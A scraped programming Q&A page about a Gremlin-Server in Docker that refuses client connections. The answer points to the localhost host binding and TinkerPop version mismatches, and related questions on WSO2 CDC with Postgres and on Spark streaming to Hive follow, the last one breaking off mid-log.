Why can't I connect to Gremlin-Server? - titan
Abstract
I'm trying to set up a Titan/Cassandra/Gremlin-Server stack in Docker (v1.13.0). The problem I'm facing is that applications trying to connect to Gremlin-Server on the default port 8182 are reporting errors (details below).
First, here is some relevant version information:
Cassandra v2.2.8
Titan v1.0.0 (Hadoop 1)
Gremlin 3.2.3
Setup
Setup takes place in a Dockerfile in order to be reproducible. It assumes that a Cassandra container already exists, running a cassandra.yaml in which start_rpc has been set to true.
The Dockerfile is as follows:
FROM openjdk:alpine
ENV TITAN 'titan-1.0.0-hadoop1'
RUN apk update && apk add bash unzip && rm -rf /var/cache/apk/* \
&& adduser -S -s /bin/bash -D srg \
&& wget -O /tmp/$TITAN.zip http://s3.thinkaurelius.com/downloads/titan/$TITAN.zip \
&& unzip /tmp/$TITAN.zip -d /opt && ln -s /opt/$TITAN /opt/titan \
&& rm /tmp/*.zip \
&& chown -R srg /opt/$TITAN/ \
&& /opt/titan/bin/gremlin-server.sh -i org.apache.tinkerpop gremlin-python 3.2.3
COPY conf/gremlin-server/* /opt/$TITAN/conf/gremlin-server/
USER srg
WORKDIR /opt/titan
EXPOSE 8182
CMD ["bin/gremlin-server.sh", "conf/gremlin-server/srg.yaml"]
The astute reader will note that I am copying custom configuration files into the container, namely a Gremlin-Server configuration file (srg.yaml) and a titan graph properties file (srg.properties).
srg.yaml
host: localhost
port: 8182
threadPoolWorker: 1
gremlinPool: 8
scriptEvaluationTimeout: 30000
serializedResponseTimeout: 30000
channelizer: org.apache.tinkerpop.gremlin.server.channel.WebSocketChannelizer
graphs: {
graph: conf/gremlin-server/srg.properties
}
plugins:
- aurelius.titan
scriptEngines: {
gremlin-groovy: {
imports: [java.lang.Math],
staticImports: [java.lang.Math.PI],
scripts: [scripts/empty-sample.groovy]},
gremlin-jython: {},
gremlin-python: {},
nashorn: {
imports: [java.lang.Math],
staticImports: [java.lang.Math.PI]}}
serializers:
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { serializeResultToString: true }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
processors:
- { className: org.apache.tinkerpop.gremlin.server.op.session.SessionOpProcessor, config: { sessionTimeout: 28800000 }}
metrics: {
consoleReporter: {enabled: true, interval: 180000},
csvReporter: {enabled: true, interval: 180000, fileName: /tmp/gremlin-server-metrics.csv},
jmxReporter: {enabled: true},
slf4jReporter: {enabled: true, interval: 180000},
gangliaReporter: {enabled: false, interval: 180000, addressingMode: MULTICAST},
graphiteReporter: {enabled: false, interval: 180000}}
threadPoolBoss: 1
maxInitialLineLength: 4096
maxHeaderSize: 8192
maxChunkSize: 8192
maxContentLength: 65536
maxAccumulationBufferComponents: 1024
resultIterationBatchSize: 64
writeBufferLowWaterMark: 32768
writeBufferHighWaterMark: 65536
ssl: {
enabled: false}
srg.properties
gremlin.graph=com.thinkaurelius.titan.core.TitanFactory
storage.backend=cassandrathrift
storage.hostname=cassandra # refers to the linked container
cache.db-cache = true
cache.db-cache-clean-wait = 20
cache.db-cache-time = 180000
cache.db-cache-size = 0.25
# Start elasticsearch inside the Titan JVM
index.search.backend=elasticsearch
index.search.directory=db/es
index.search.elasticsearch.client-only=false
index.search.elasticsearch.local-mode=true
Execution
The container is run with the following command: docker run -ti --rm=true --link test.cassandra:cassandra -p 8182:8182 titan.
Here is the log output for Gremlin-Server:
0 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer -
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
297 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Configuring Gremlin Server from conf/gremlin-server/srg.yaml
439 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics ConsoleReporter configured with report interval=180000ms
448 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics CsvReporter configured with report interval=180000ms to fileName=/tmp/gremlin-server-metrics.csv
557 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics JmxReporter configured with domain= and agentId=
561 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
1750 [main] INFO com.thinkaurelius.titan.core.util.ReflectiveConfigOptionLoader - Loaded and initialized config classes: 12 OK out of 12 attempts in PT0.148S
1972 [main] INFO com.thinkaurelius.titan.diskstorage.cassandra.thrift.CassandraThriftStoreManager - Closed Thrift connection pooler.
1990 [main] INFO com.thinkaurelius.titan.graphdb.configuration.GraphDatabaseConfiguration - Generated unique-instance-id=ac1100031-ad2d5ffa52e81
2026 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring index [search]
2386 [main] INFO org.elasticsearch.node - [Lunatik] version[1.5.1], pid[1], build[5e38401/2015-04-09T13:41:35Z]
2387 [main] INFO org.elasticsearch.node - [Lunatik] initializing ...
2399 [main] INFO org.elasticsearch.plugins - [Lunatik] loaded [], sites []
6471 [main] INFO org.elasticsearch.node - [Lunatik] initialized
6472 [main] INFO org.elasticsearch.node - [Lunatik] starting ...
6477 [main] INFO org.elasticsearch.transport - [Lunatik] bound_address {local[1]}, publish_address {local[1]}
6507 [main] INFO org.elasticsearch.discovery - [Lunatik] elasticsearch/u2StmRW1RsyEHw561yoNFw
6519 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.service - [Lunatik] master {new [Lunatik][u2StmRW1RsyEHw561yoNFw][ad2d5ffa52e8][local[1]]{local=true}}, removed {[Lunatik][kKyL9UE-R123LLZTTrsVCw][ad2d5ffa52e8][local[1]]{local=true},}, reason: local-disco-initial_connect(master)
6908 [main] INFO org.elasticsearch.http - [Lunatik] bound_address {inet[/0:0:0:0:0:0:0:0:9200]}, publish_address {inet[/172.17.0.3:9200]}
6909 [main] INFO org.elasticsearch.node - [Lunatik] started
6923 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.gateway - [Lunatik] recovered [0] indices into cluster_state
7486 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.metadata - [Lunatik] [titan] creating index, cause [api], templates [], shards [5]/[1], mappings []
8075 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Initiated backend operations thread pool of size 4
8241 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring total store cache size: 94787290
8641 [main] INFO com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog - Loaded unidentified ReadMarker start time 2017-01-21T16:31:28.750Z into com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog$MessagePuller#3520958b
8642 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Graph [graph] was successfully configured via [conf/gremlin-server/srg.properties].
8643 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
14187 [main] INFO com.jcabi.manifests.Manifests - 108 attributes loaded from 264 stream(s) in 185ms, 108 saved, 3371 ignored: ["Agent-Class", "Ant-Version", "Archiver-Version", "Bnd-LastModified", "Boot-Class-Path", "Build-Date", "Build-Host", "Build-Id", "Build-Java-Version", "Build-Jdk", "Build-Job", "Build-Number", "Build-Time", "Build-Timestamp", "Build-Version", "Built-At", "Built-By", "Built-OS", "Built-On", "Built-Status", "Bundle-ActivationPolicy", "Bundle-Activator", "Bundle-BuddyPolicy", "Bundle-Category", "Bundle-ClassPath", "Bundle-Classpath", "Bundle-Copyright", "Bundle-Description", "Bundle-DocURL", "Bundle-License", "Bundle-Localization", "Bundle-ManifestVersion", "Bundle-Name", "Bundle-NativeCode", "Bundle-RequiredExecutionEnvironment", "Bundle-SymbolicName", "Bundle-Vendor", "Bundle-Version", "Can-Redefine-Classes", "Change", "Class-Path", "Created-By", "DynamicImport-Package", "Eclipse-AutoStart", "Eclipse-BuddyPolicy", "Eclipse-SourceReferences", "Embed-Dependency", "Embedded-Artifacts", "Export-Package", "Extension-Name", "Extension-name", "Fragment-Host", "Git-Commit-Branch", "Git-Commit-Date", "Git-Commit-Hash", "Git-Committer-Email", "Git-Committer-Name", "Gradle-Version", "Gremlin-Lib-Paths", "Gremlin-Plugin-Dependencies", "Gremlin-Plugin-Paths", "Ignore-Package", "Implementation-Build", "Implementation-Build-Date", "Implementation-Title", "Implementation-URL", "Implementation-Vendor", "Implementation-Vendor-Id", "Implementation-Version", "Import-Package", "Include-Resource", "JCabi-Build", "JCabi-Date", "JCabi-Version", "Java-Vendor", "Java-Version", "Main-Class", "Main-class", "Manifest-Version", "Maven-Version", "Module-Email", "Module-Origin", "Module-Owner", "Module-Source", "Originally-Created-By", "Os-Arch", "Os-Name", "Os-Version", "Package", "Premain-Class", "Private-Package", "Require-Bundle", "Require-Capability", "Scm-Connection", "Scm-Revision", "Scm-Url", "Specification-Title", "Specification-Vendor", "Specification-Version", "Tool", "X-Compile-Source-JDK", "X-Compile-Target-JDK", "hash", "implementation-version", "mode", "package", "url", "version"]
14842 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-jython ScriptEngine
15540 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded nashorn ScriptEngine
16076 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-python ScriptEngine
16553 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-groovy ScriptEngine
17410 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts/empty-sample.groovy
17410 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.
17419 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[standardtitangraph[cassandrathrift:[cassandra]], standard]
17565 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17566 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17808 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0
17811 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0
17958 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
17959 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Channel started at port 8182.
1/21/17 4:34:20 PM =============================================================
-- Meters ----------------------------------------------------------------------
org.apache.tinkerpop.gremlin.server.GremlinServer.errors
count = 0
mean rate = 0.00 events/second
1-minute rate = 0.00 events/second
5-minute rate = 0.00 events/second
15-minute rate = 0.00 events/second
180564 [metrics-logger-reporter-thread-1] INFO org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics - type=METER, name=org.apache.tinkerpop.gremlin.server.GremlinServer.errors, count=0, mean_rate=0.0, m1=0.0, m5=0.0, m15=0.0, rate_unit=events/second
Symptoms
So far, everything appears to be working as intended. The logs indicate that I am able to load srg.properties and bind the data structure to a variable called graph.
The problem appears when I try to connect to the Gremlin-Server instance over the exported port 8182, for example using gremlin-python:
# executed via python 3.6.0 on the host machine, i.e. not inside of Docker
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin','graph'))
produces the following exception ...
---------------------------------------------------------------------------
HTTPError Traceback (most recent call last)
<ipython-input-10-59ad504f29b4> in <module>()
----> 1 g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/','g'))
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/gremlin_python/driver/driver_remote_connection.py in __init__(self, url, traversal_source, username, password, loop, graphson_reader, graphson_writer)
41 self._password = password
42 if loop is None: self._loop = ioloop.IOLoop.current()
---> 43 self._websocket = self._loop.run_sync(lambda: websocket.websocket_connect(self.url))
44 self._graphson_reader = graphson_reader or GraphSONReader()
45 self._graphson_writer = graphson_writer or GraphSONWriter()
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/ioloop.py in run_sync(self, func, timeout)
455 if not future_cell[0].done():
456 raise TimeoutError('Operation timed out after %s seconds' % timeout)
--> 457 return future_cell[0].result()
458
459 def time(self):
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/concurrent.py in result(self, timeout)
235 return self._result
236 if self._exc_info is not None:
--> 237 raise_exc_info(self._exc_info)
238 self._check_done()
239 return self._result
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/util.py in raise_exc_info(exc_info)
HTTPError: HTTP 599: Stream closed
Suspecting a problem specific to this library:
1) attempt to connect to the websocket port with nc
$ nc -z -v localhost 8182
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif lo0
src ::1 port 58627
dst ::1 port 8182
rank info not available
TCP aux info available
Connection to localhost port 8182 [tcp/*] succeeded!
2) attempt to connect to Gremlin-Server using a different client library, namely go-gremlin
Test case:
package main
import (
"fmt"
"log"
"github.com/go-gremlin/gremlin"
)
func main() {
if err := gremlin.NewCluster("ws://localhost:8182/gremlin"); err != nil {
log.Fatal(err)
}
data, err := gremlin.Query(`graph.V()`).Exec()
if err != nil {
log.Fatalf("Query error: %s", err)
}
fmt.Println(string(data))
}
Output:
$ go run cmd/test/main.go
2017/01/21 14:47:42 Query error: unexpected EOF
exit status 1
Current Conclusions & Questions
From the previous tests, I conclude that this is an application-level problem (i.e. a problem on the websocket or ws protocol level, not a problem in the host or container networking stack). Indeed, nc reports that the socket connection is successful, but in both the Python and Go client libraries ostensibly complain of an inappropriate (empty) response from the server.
I have tried removing the /gremlin path from the websocket URL both in gremlin-python and in go-gremlin, to no avail.
My question is: where do I go from here? Any suggestions or diagnostic paths would be most appreciated!
The main problem is that the host in your Gremlin Server configuration is set to the default which is localhost. This will only allow connections from the server itself. You need to change the value to an external IP of the server or 0.0.0.0.
The other issue is that gremlin-python server plugin was made available with Apache TinkerPop 3.2.2. Titan 1.0.0 uses TinkerPop 3.0.1. I dobut that the gremlin-python 3.2.3 plugin will work with Titan 1.0.0.
Update: Consider using JanusGraph 0.1.1 which uses TinkerPop 3.2.3. JanusGraph was forked from Titan, so the code is basically the same with updated dependencies.
Related
CDC with WSO2 Streaming Integrator and Postgres DB
I am trying to setup Change Data Capture (CDC) between WSO2 Streaming Integrator and a local Postgres DB. I have added the Postgres Driver (v42.2.5) to SI_HOME/lib and I am able to read data from the database from a Siddhi application. I am following the CDCWithListeningMode example to implement CDC and I am using pgoutput as the logical decoding plugin. But when I run the application I get the following log. [2020-04-23_19-02-37_460] INFO {org.apache.kafka.connect.json.JsonConverterConfig} - JsonConverterConfig values: converter.type = key schemas.cache.size = 1000 schemas.enable = true [2020-04-23_19-02-37_461] INFO {org.apache.kafka.connect.json.JsonConverterConfig} - JsonConverterConfig values: converter.type = value schemas.cache.size = 1000 schemas.enable = false [2020-04-23_19-02-37_461] INFO {io.debezium.embedded.EmbeddedEngine$EmbeddedConfig} - EmbeddedConfig values: access.control.allow.methods = access.control.allow.origin = bootstrap.servers = [localhost:9092] header.converter = class org.apache.kafka.connect.storage.SimpleHeaderConverter internal.key.converter = class org.apache.kafka.connect.json.JsonConverter internal.value.converter = class org.apache.kafka.connect.json.JsonConverter key.converter = class org.apache.kafka.connect.json.JsonConverter listeners = null metric.reporters = [] metrics.num.samples = 2 metrics.recording.level = INFO metrics.sample.window.ms = 30000 offset.flush.interval.ms = 60000 offset.flush.timeout.ms = 5000 offset.storage.file.filename = offset.storage.partitions = null offset.storage.replication.factor = null offset.storage.topic = plugin.path = null rest.advertised.host.name = null rest.advertised.listener = null rest.advertised.port = null rest.host.name = null rest.port = 8083 ssl.client.auth = none task.shutdown.graceful.timeout.ms = 5000 value.converter = class org.apache.kafka.connect.json.JsonConverter [2020-04-23_19-02-37_516] INFO {io.debezium.connector.common.BaseSourceTask} - offset.storage = io.siddhi.extension.io.cdc.source.listening.InMemoryOffsetBackingStore [2020-04-23_19-02-37_517] INFO {io.debezium.connector.common.BaseSourceTask} - database.server.name = localhost_5432 [2020-04-23_19-02-37_517] INFO {io.debezium.connector.common.BaseSourceTask} - database.port = 5432 [2020-04-23_19-02-37_517] INFO {io.debezium.connector.common.BaseSourceTask} - table.whitelist = SweetProductionTable [2020-04-23_19-02-37_517] INFO {io.debezium.connector.common.BaseSourceTask} - cdc.source.object = 1716717434 [2020-04-23_19-02-37_517] INFO {io.debezium.connector.common.BaseSourceTask} - database.hostname = localhost [2020-04-23_19-02-37_518] INFO {io.debezium.connector.common.BaseSourceTask} - database.password = ******** [2020-04-23_19-02-37_518] INFO {io.debezium.connector.common.BaseSourceTask} - name = CDCWithListeningModeinsertSweetProductionStream [2020-04-23_19-02-37_518] INFO {io.debezium.connector.common.BaseSourceTask} - server.id = 6140 [2020-04-23_19-02-37_519] INFO {io.debezium.connector.common.BaseSourceTask} - database.history = io.debezium.relational.history.FileDatabaseHistory [2020-04-23_19-02-38_103] INFO {io.debezium.connector.postgresql.PostgresConnectorTask} - user 'user_name' connected to database 'db_name' on PostgreSQL 11.5, compiled by Visual C++ build 1914, 64-bit with roles: role 'user_name' [superuser: false, replication: true, inherit: true, create role: false, create db: false, can log in: true] (Encoded) [2020-04-23_19-02-38_104] INFO {io.debezium.connector.postgresql.PostgresConnectorTask} - No previous offset found [2020-04-23_19-02-38_104] INFO {io.debezium.connector.postgresql.PostgresConnectorTask} - Taking a new snapshot of the DB and streaming logical changes once the snapshot is finished... [2020-04-23_19-02-38_105] INFO {io.debezium.util.Threads} - Requested thread factory for connector PostgresConnector, id = localhost_5432 named = records-snapshot-producer [2020-04-23_19-02-38_105] INFO {io.debezium.util.Threads} - Requested thread factory for connector PostgresConnector, id = localhost_5432 named = records-stream-producer [2020-04-23_19-02-38_293] INFO {io.debezium.connector.postgresql.connection.PostgresConnection} - Obtained valid replication slot ReplicationSlot [active=false, latestFlushedLSN=null] [2020-04-23_19-02-38_704] ERROR {io.siddhi.core.stream.input.source.Source} - Error on 'CDCWithListeningMode'. Connection to the database lost. Error while connecting at Source 'cdc' at 'insertSweetProductionStream'. Will retry in '5 sec'. (Encoded) io.siddhi.core.exception.ConnectionUnavailableException: Connection to the database lost. at io.siddhi.extension.io.cdc.source.CDCSource.lambda$connect$1(CDCSource.java:424) at io.debezium.embedded.EmbeddedEngine.run(EmbeddedEngine.java:793) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:834) Caused by: org.apache.kafka.connect.errors.ConnectException: Cannot create replication connection at io.debezium.connector.postgresql.connection.PostgresReplicationConnection.(PostgresReplicationConnection.java:87) at io.debezium.connector.postgresql.connection.PostgresReplicationConnection.(PostgresReplicationConnection.java:38) at io.debezium.connector.postgresql.connection.PostgresReplicationConnection$ReplicationConnectionBuilder.build(PostgresReplicationConnection.java:362) at io.debezium.connector.postgresql.PostgresTaskContext.createReplicationConnection(PostgresTaskContext.java:65) at io.debezium.connector.postgresql.RecordsStreamProducer.(RecordsStreamProducer.java:81) at io.debezium.connector.postgresql.RecordsSnapshotProducer.(RecordsSnapshotProducer.java:70) at io.debezium.connector.postgresql.PostgresConnectorTask.createSnapshotProducer(PostgresConnectorTask.java:133) at io.debezium.connector.postgresql.PostgresConnectorTask.start(PostgresConnectorTask.java:86) at io.debezium.connector.common.BaseSourceTask.start(BaseSourceTask.java:45) at io.debezium.embedded.EmbeddedEngine.run(EmbeddedEngine.java:677) ... 3 more Caused by: io.debezium.jdbc.JdbcConnectionException: ERROR: could not access file "decoderbufs": No such file or directory at io.debezium.connector.postgresql.connection.PostgresReplicationConnection.initReplicationSlot(PostgresReplicationConnection.java:145) at io.debezium.connector.postgresql.connection.PostgresReplicationConnection.(PostgresReplicationConnection.java:79) ... 12 more Caused by: org.postgresql.util.PSQLException: ERROR: could not access file "decoderbufs": No such file or directory at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2440) at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2183) at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:308) at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:441) at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:365) at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:307) at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:293) at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:270) at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:266) at org.postgresql.replication.fluent.logical.LogicalCreateSlotBuilder.make(LogicalCreateSlotBuilder.java:48) at io.debezium.connector.postgresql.connection.PostgresReplicationConnection.initReplicationSlot(PostgresReplicationConnection.java:108) ... 13 more Debezium defaults to decoderbufs plugin - "could not access file "decoderbufs": No such file or directory". According to this answer, the issue is due to the configuration of decoderbufs plugin. Details Postgres - 11.4 siddhi-cdc-io - 2.0.3 Debezium - 0.8.3 How do I configure the embedded debezium engine to use the pgoutput plugin? Will changing this configuration fix the error? Please help me with this issue. I have not found any resources that can help me.
you either need to update the Debezium to the latest 1.1 version - this will enable you to use pgoutput plugin using plugin.name config option or you need to deploy (and maybe build) decoderbufs.so library to your PostgreSQL database. I'd recommend the former as 0.8.3 is very old version.
I observed this behavior with PostgreSQL 12 when I tried to do CDC with pgoutput logical decoding output plug-in. It seems like even though I configured the database with pgoutput, the siddhi extension is trying to make the connection using "decoderbufs" as decoding plug-in. When I tried configuring decoderbufs as the logical decoding output plug-in in the database level, I was able to use siddhi io extension without any issue. It seems like for now, Siddhi io CDC only supports decoderbufs logical decoding output plug-in with PostgreSQL.
Scala/Spark Streaming Store transformed kafka messages to Hive
As a datasource I am using a kafka stream to consume tweets. I have written a simple spark streaming application. I am able to consume the tweets and I am able convert the records to my own case class. But I am not able to write to a hive table located in the same docker as spark. Can you give me a hint of how to solve it. import com.fhjoanneum.swd18.grp3.bigdata.convert.TweetToTwitterDbRecord import com.fhjoanneum.swd18.grp3.bigdata.domain.Tweet import com.typesafe.scalalogging.LazyLogging import org.apache.spark.sql._ import org.json4s.jackson.JsonMethods.parse import org.json4s.{DefaultFormats} case object TwitterInputStream extends App with LazyLogging { val spark = SparkSession .builder() .appName(s"TestApp") .master("local[*]") .config("hive.metastore.uris", "thrift://0.0.0.0:9083") .enableHiveSupport() .getOrCreate() spark.sql("set hive.exec.dynamic.partition.mode=nonstrict") spark.sql("SET hive.exec.parallel=true") spark.sql("SET hive.exec.parallel.thread.number=16") val df = spark.readStream .format("kafka") .option("kafka.bootstrap.servers", "192.168.1.156:9092") .option("subscribe", "twitter-status") .option("startingOffsets", "latest") // From starting .load() import spark.implicits._ val testerDF = df.selectExpr("CAST(value AS STRING)").as[String] val parsedMsgs = testerDF.map(value => { implicit val formats = DefaultFormats val tweet = parse(value).extract[Tweet] tweet }) // the following part causes my problems: val query = parsedMsgs.map(TweetToTwitterDbRecord) .writeStream.foreachBatch((batchDs: Dataset[_], batchId: Long) => batchDs.write .format("parquet") .mode(SaveMode.Append) .insertInto("grp3.tweets") ).start().awaitTermination() // the commented part works: // parsedMsgs.writeStream // .format("console") // .outputMode("append") // .start() // .awaitTermination() } The table where I wanna write was created by this statement: CREATE EXTERNAL TABLE `tweets`( `id` BigInt, `createdAt` String, `text` String, `userId` Int, `geo` String, `coordinates` String, `place` String, `quoteCount` Int, `replyCount` Int, `retweetCount` Int, `favoriteCount` Int, `timestampMs` BigInt ) ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' STORED AS PARQUET LOCATION '/data/bigdata/tweets' TBLPROPERTIES ("parquet.compression"="SNAPPY"); It does not break. I have to switch my LOGGER to DEBUG to see whats going on. The following are the last lines of my logger output: 2020-01-28 21:38:53 INFO ParquetWriteSupport:54 - Initialized Parquet WriteSupport with Catalyst schema: { "type" : "struct", "fields" : [ { "name" : "id", "type" : "long", "nullable" : true, "metadata" : { } }, { "name" : "createdat", "type" : "string", "nullable" : true, "metadata" : { } }, { "name" : "text", "type" : "string", "nullable" : true, "metadata" : { } }, { "name" : "userid", "type" : "integer", "nullable" : false, "metadata" : { } }, { "name" : "geo", "type" : "string", "nullable" : true, "metadata" : { } }, { "name" : "coordinates", "type" : "string", "nullable" : true, "metadata" : { } }, { "name" : "place", "type" : "string", "nullable" : true, "metadata" : { } }, { "name" : "quotecount", "type" : "integer", "nullable" : false, "metadata" : { } }, { "name" : "replycount", "type" : "integer", "nullable" : false, "metadata" : { } }, { "name" : "retweetcount", "type" : "integer", "nullable" : false, "metadata" : { } }, { "name" : "favoritecount", "type" : "integer", "nullable" : false, "metadata" : { } }, { "name" : "timestampms", "type" : "long", "nullable" : true, "metadata" : { } } ] } and corresponding Parquet message type: message spark_schema { optional int64 id; optional binary createdat (UTF8); optional binary text (UTF8); required int32 userid; optional binary geo (UTF8); optional binary coordinates (UTF8); optional binary place (UTF8); required int32 quotecount; required int32 replycount; required int32 retweetcount; required int32 favoritecount; optional int64 timestampms; } 2020-01-28 21:38:53 DEBUG DFSClient:1646 - /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet: masked=rw-r--r-- 2020-01-28 21:38:53 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #7 2020-01-28 21:38:53 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #7 2020-01-28 21:38:53 DEBUG ProtobufRpcEngine:253 - Call: create took 4ms 2020-01-28 21:38:53 DEBUG DFSClient:1802 - computePacketChunkSize: src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, chunkSize=516, chunksPerPacket=127, packetSize=65532 2020-01-28 21:38:53 DEBUG LeaseRenewer:301 - Lease renewer daemon for [DFSClient_NONMAPREDUCE_469557971_72] with renew id 1 started 2020-01-28 21:38:53 DEBUG ParquetFileWriter:281 - 0: start 2020-01-28 21:38:53 DEBUG MemoryManager:63 - Allocated total memory pool is: 3626971910 2020-01-28 21:38:53 INFO CodecPool:151 - Got brand-new compressor [.snappy] 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 